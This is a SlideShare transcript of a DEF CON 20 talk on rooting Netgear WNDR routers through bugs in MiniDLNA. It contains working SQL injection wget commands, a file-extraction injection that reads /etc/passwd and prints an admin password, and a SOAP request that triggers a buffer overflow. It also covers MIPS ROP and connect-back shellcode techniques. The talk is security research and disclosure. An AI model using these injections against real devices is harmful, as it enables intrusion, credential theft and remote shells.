From SQL Injection to MIPSOverflowsRooting SOHO RoutersZachary CutlipTwitter: @zcutlipzcutlip@tacnetsol.com   DEF CON 20
AcknowledgementsTactical Network SolutionsCraig Heffner
What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in Net...
Read the paperLots of essential detailsNot enough time in this talk to cover it allPlease read it
Why attack SOHO routers?Offers attacker privileged vantage point  Exposes multiple connected users to attack  Exposes all ...
Target device: NetgearWNDR3700 v3 Fancy-pants SOHO Wireless Router DLNA Mutlimedia server File server w/USB storage
Other affected devices Netgear WNDR 3800 Netgear WNDR 4000 Netgear WNDR 4400
First step: take it apart
UARTheader
UART to USBadapter
USB portHelps analysis  Retrieve SQLite DB  Load a debugger  onto the router
Analyzing the DeviceSoftware Download firmware update from vendor, unpack See Craig Heffner’s blog for more on firmware unpa...
$ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chkDECIMAL 	 HEX             D                          	 ESCRIPTION--------------...
Target Application:MiniDLNA
What is DLNA?Digital Living NetworkAllianceInteroperabilitybetween gadgetsMultimedia playback,etc.But Most Importantly...
Attack Surface
Google reveals: opensource!
Source code analysis‘strings’ reports shipping binary is 1.0.18Download source for our version.Search source for low-hangi...
SQL injection: more thanmeets the eye Privileged access to data What if the data is not sensitive or valuable? Opportunity...
Vulnerability 1: SQL injection grep -rn SELECT * | grep ‘%s’ 21 results, such as:   sprintf(sql_buf, "SELECT PATH from ALB...
Closer look
Album art query
Test the vulnerability$	  wget	  http://10.10.10.1:8200/AlbumArt/"1;	  INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(3133...
w00t! Success!sqlite>	  select	  *	  from	  ALBUM_ART	  where	  ID=31337;31337|pwned
Good news / Bad newsWorking SQL injectionTrivial to exploitNo valuable informationEven if destroyed, DB is regenerated
Vulnerability 2: Remote FileExtraction
MiniDLNA Database:sqlite>	  select	  *	  from	  ALBUM_ART;1	  |	  /tmp/mnt/usb0/part1/	  	  .ReadyDLNA//art_cache/tmp/shar...
Test the Vulnerability$	  wget	  http://10.10.10.1:8200/AlbumArt/"1;INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(31337,/...
Passwords$ cat 31337-18.jpgnobody:*:0:0:nobody:/:/bin/shadmin:qw12QW!@:0:0:admin:/:/bin/shguest:guest:0:0:guest:/:/bin/sh
admin:qw12QW!@:0:0:admin:/:/bin/sh
Vulnerability 3: RemoteCode Execution
i.e., Pop a shell
Where have all the strcpy()gone?
$	  find	  .	  -­‐name	  *.c	  -­‐print	  |	  xargs	  grep	  -­‐E	  	  sprintf(|strcat(|strcpy(	  |	  	  	  grep	  -­‐v	  ...
265 <--Here they are.
Left join madness
album_art in sprintf() is DETAILS.ALBUM_ART.Schema shows it’s an INT.sqlite>	  .schema	  DETAILSCREATE	  TABLE	  DETAILS	 ...
Two things to note DETAILS.ALBUM_ART is an INT, but it can store arbitrary data   This is due to “type affinity” callback()...
Exploitable buffer overflow? We have full control over the DB from Vuln #1 We need to:   Stage shellcode in database   Trig...
SQL injection limitation Limited length of SQL injection, approx. 128 bytes per pass. Target buffer is 512 bytes. SQLite c...
Trigger query of stagedexploit Model DLNA in Python   Python Coherence library Capture conversation in Wireshark Save SOAP...
Wireshark capture
SOAP request
Things you needConsole access to the device  There is a UART header on the PCBgdbserver cross-compiled for MIPSgdb compile...
Test Vulnerability Use wget to SQL inject overflow data   Set up initial records in OBJECTS and DETAILS Attach gdbserver on...
Trigger the exploit$ wget http://10.10.10.1:8200/ctl/ContentDir  --header="Host: 10.10.10.1"  --header= SOAPACTION: "urn:s...
w00t! Success!
We control the horizontaland the vertical We own the program counter, and therefore execution Also all “S” registers: $S0-...
Owning $PC is great, butgive me a shell
Getting Execution:Challenges Stack ASLR MIPS Architecture idiosyncrasies Return Oriented Programming is limited (but possi...
Getting Execution:Advantages No ASLR for executable, heap, & libraries Executable stack
ROP on MIPSAll MIPS instructions are 4-bytesAll MIPS memory access must be 4-byte alignedNo jumping into the middle of ins...
ROP on MIPSWe can return into useful instruction sequences:  Manipulate registers  Load $PC from registers or memory we co...
Locate stack using ROPLoad several offsets from stack pointer into$S3,$S4,$S6Load $S0 into $T9 and jump
MIPS cache coherencyMIPS has two parallel caches:  Instruction Cache  Data CachePayload written to the stack as data  Resi...
MIPS Cache CoherencyCan’t execute off stack until cache is flushedWrite lots to memory, trigger flush?  Cache is often 32K-6...
Bad charactersCommon challenge with shellcode  Spaces break HTTP  Null bytes break strcpy()/sprintf()SQLite also has bad c...
“x7ax69xcexe4xff”,“x’0d’”,“x3cx0ax0axadx35”
Trouble with EncodersMetasploit payload + XOR Encoder==No Joy  Metasploit only provides one of each  Caching problem?Wrote...
Mitigations Less crappy programming Privilege separation Mandatory Access Controls, e.g. SELinux
UpshotDeveloper assumes well-formed dataCompromise database integrity, violate developerassumptionsEven if the database is...
Read the Paper
Demo Time
DefCon 2012 - Rooting SOHO Routers
Upcoming SlideShare
Loading in...5
×

DefCon 2012 - Rooting SOHO Routers

1,262

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total Views
1,262
On Slideshare
0
From Embeds
0
Number of Embeds
0
Actions
Shares
0
Downloads
28
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

DefCon 2012 - Rooting SOHO Routers

  1. 1. From SQL Injection to MIPSOverflowsRooting SOHO RoutersZachary CutlipTwitter: @zcutlipzcutlip@tacnetsol.com DEF CON 20
  2. 2. AcknowledgementsTactical Network SolutionsCraig Heffner
  3. 3. What I’m going to talk about Novel uses of SQL injection Buffer overflows on MIPS architecture 0-day Vulnerabilities in Netgear routers Embedded device investigation process Live demo: Root shell & more
  4. 4. Read the paperLots of essential detailsNot enough time in this talk to cover it allPlease read it
  5. 5. Why attack SOHO routers?Offers attacker privileged vantage point Exposes multiple connected users to attack Exposes all users’ Internet comms to snooping/ manipulationOften unauthorized side doors into enterprise networks
  6. 6. Target device: NetgearWNDR3700 v3 Fancy-pants SOHO Wireless Router DLNA Mutlimedia server File server w/USB storage
  7. 7. Other affected devices Netgear WNDR 3800 Netgear WNDR 4000 Netgear WNDR 4400
  8. 8. First step: take it apart
  9. 9. UARTheader
  10. 10. UART to USBadapter
  11. 11. USB portHelps analysis Retrieve SQLite DB Load a debugger onto the router
  12. 12. Analyzing the DeviceSoftware Download firmware update from vendor, unpack See Craig Heffner’s blog for more on firmware unpacking http://www.devttys0.com/blog
  13. 13. $ binwalk ./WNDR3700v3-V1.0.0.18_1.0.14.chkDECIMAL HEX D ESCRIPTION---------------------------------------------------86 0x56 L ZMA compressed data1423782 0x15B9A6 Squashfs filesystem$ dd if=WNDR3700v3-V1.0.0.18_1.0.14.chk of=kernel.7z bs=1 skip=86 count=1423696$ p7zip -d kernel.7z$ strings kernel | grep Linux versionLinux version 2.6.22 (peter@localhost.localdomain) (gcc version 4.2.3) #1 Wed Sep 1410:38:51 CST 2011 Linux--Woo hoo!
  14. 14. Target Application:MiniDLNA
  15. 15. What is DLNA?Digital Living NetworkAllianceInteroperabilitybetween gadgetsMultimedia playback,etc.But Most Importantly...
  16. 16. Attack Surface
  17. 17. Google reveals: opensource!
  18. 18. Source code analysis‘strings’ reports shipping binary is 1.0.18Download source for our version.Search source for low-hanging fruit
  19. 19. SQL injection: more thanmeets the eye Privileged access to data What if the data is not sensitive or valuable? Opportunity to violate developer assumptions
  20. 20. Vulnerability 1: SQL injection grep -rn SELECT * | grep ‘%s’ 21 results, such as: sprintf(sql_buf, "SELECT PATH from ALBUM_ART where ID = %s", object);
  21. 21. Closer look
  22. 22. Album art query
  23. 23. Test the vulnerability$  wget  http://10.10.10.1:8200/AlbumArt/"1;  INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(31337,pwned);"-­‐throwaway.jpg
  24. 24. w00t! Success!sqlite>  select  *  from  ALBUM_ART  where  ID=31337;31337|pwned
  25. 25. Good news / Bad newsWorking SQL injectionTrivial to exploitNo valuable informationEven if destroyed, DB is regenerated
  26. 26. Vulnerability 2: Remote FileExtraction
  27. 27. MiniDLNA Database:sqlite>  select  *  from  ALBUM_ART;1  |  /tmp/mnt/usb0/part1/    .ReadyDLNA//art_cache/tmp/shares/      USB_Storage/01  -­‐  Unforgivable  (First  State  Remix).jpg
  28. 28. Test the Vulnerability$  wget  http://10.10.10.1:8200/AlbumArt/"1;INSERT/**/into/**/ALBUM_ART(ID,PATH)/**/VALUES(31337,/etc/passwd);"-­‐throwaway.jpg$  wget  http://10.10.10.1:8200/AlbumArt/31337-­‐18.jpg
  29. 29. Passwords$ cat 31337-18.jpgnobody:*:0:0:nobody:/:/bin/shadmin:qw12QW!@:0:0:admin:/:/bin/shguest:guest:0:0:guest:/:/bin/sh
  30. 30. admin:qw12QW!@:0:0:admin:/:/bin/sh
  31. 31. Vulnerability 3: RemoteCode Execution
  32. 32. i.e., Pop a shell
  33. 33. Where have all the strcpy()gone?
  34. 34. $  find  .  -­‐name  *.c  -­‐print  |  xargs  grep  -­‐E    sprintf(|strcat(|strcpy(  |      grep  -­‐v  asprintf  |  wc  -­‐l265    <--Here they are.
  35. 35. 265 <--Here they are.
  36. 36. Left join madness
  37. 37. album_art in sprintf() is DETAILS.ALBUM_ART.Schema shows it’s an INT.sqlite>  .schema  DETAILSCREATE  TABLE  DETAILS  (  ID  INTEGER  PRIMARY  KEY  AUTOINCREMENT,                                            ...,  ALBUM_ART  INTEGER  DEFAULT  0,  ...);
  38. 38. Two things to note DETAILS.ALBUM_ART is an INT, but it can store arbitrary data This is due to “type affinity” callback() attempts to “validate” using atoi(), but this is busted atoi(“1_omg_learn_to_c0d3”) == 1 ALBUM_ART need only start with a (non-zero) int Weak sauce
  39. 39. Exploitable buffer overflow? We have full control over the DB from Vuln #1 We need to: Stage shellcode in database Trigger query of our staged data
  40. 40. SQL injection limitation Limited length of SQL injection, approx. 128 bytes per pass. Target buffer is 512 bytes. SQLite concatenation operator: “||” UPDATE DETAILS set ALBUM_ART=ALBUM_ART|| “AAAA” where ID=3
  41. 41. Trigger query of stagedexploit Model DLNA in Python Python Coherence library Capture conversation in Wireshark Save SOAP request for playback with wget
  42. 42. Wireshark capture
  43. 43. SOAP request
  44. 44. Things you needConsole access to the device There is a UART header on the PCBgdbserver cross-compiled for MIPSgdb compiled for MIPS target architecture
  45. 45. Test Vulnerability Use wget to SQL inject overflow data Set up initial records in OBJECTS and DETAILS Attach gdbserver on the target to minidlna.exe Connect local gdb to remote session Use wget to POST the SOAP request How much overflow data?
  46. 46. Trigger the exploit$ wget http://10.10.10.1:8200/ctl/ContentDir --header="Host: 10.10.10.1" --header= SOAPACTION: "urn:schemas-upnp-org:service:ContentDirectory:1#Browse" --header="content-type: text/xml ;charset="utf-8" --header="connection: close" --post-file=./soaprequest.xml
  47. 47. w00t! Success!
  48. 48. We control the horizontaland the vertical We own the program counter, and therefore execution Also all “S” registers: $S0-$S8 Very useful for Return Oriented Programming exploit
  49. 49. Owning $PC is great, butgive me a shell
  50. 50. Getting Execution:Challenges Stack ASLR MIPS Architecture idiosyncrasies Return Oriented Programming is limited (but possible) “Bad” Characters due to HTTP & SQL
  51. 51. Getting Execution:Advantages No ASLR for executable, heap, & libraries Executable stack
  52. 52. ROP on MIPSAll MIPS instructions are 4-bytesAll MIPS memory access must be 4-byte alignedNo jumping into the middle of instructions
  53. 53. ROP on MIPSWe can return into useful instruction sequences: Manipulate registers Load $PC from registers or memory we control Help locate stack, defeating ASLR
  54. 54. Locate stack using ROPLoad several offsets from stack pointer into$S3,$S4,$S6Load $S0 into $T9 and jump
  55. 55. MIPS cache coherencyMIPS has two parallel caches: Instruction Cache Data CachePayload written to the stack as data Resides in data cache until flushed
  56. 56. MIPS Cache CoherencyCan’t execute off stack until cache is flushedWrite lots to memory, trigger flush? Cache is often 32K-64KLinux provides cacheflush() system call ROP into it
  57. 57. Bad charactersCommon challenge with shellcode Spaces break HTTP Null bytes break strcpy()/sprintf()SQLite also has bad characters e.g., 0x0d, carriage return SQLite escape to the rescue: “x’0d’”
  58. 58. “x7ax69xcexe4xff”,“x’0d’”,“x3cx0ax0axadx35”
  59. 59. Trouble with EncodersMetasploit payload + XOR Encoder==No Joy Metasploit only provides one of each Caching problem?Wrote my own NUL-Safe connect-back payload No need for encoder Pro Tip: Avoid endianness problems by connecting back to 10.10.10.10
  60. 60. Mitigations Less crappy programming Privilege separation Mandatory Access Controls, e.g. SELinux
  61. 61. UpshotDeveloper assumes well-formed dataCompromise database integrity, violate developerassumptionsEven if the database is low value
  62. 62. Read the Paper
  63. 63. Demo Time
  1. A particular slide catching your eye?

    Clipping is a handy way to collect important slides you want to go back to later.

×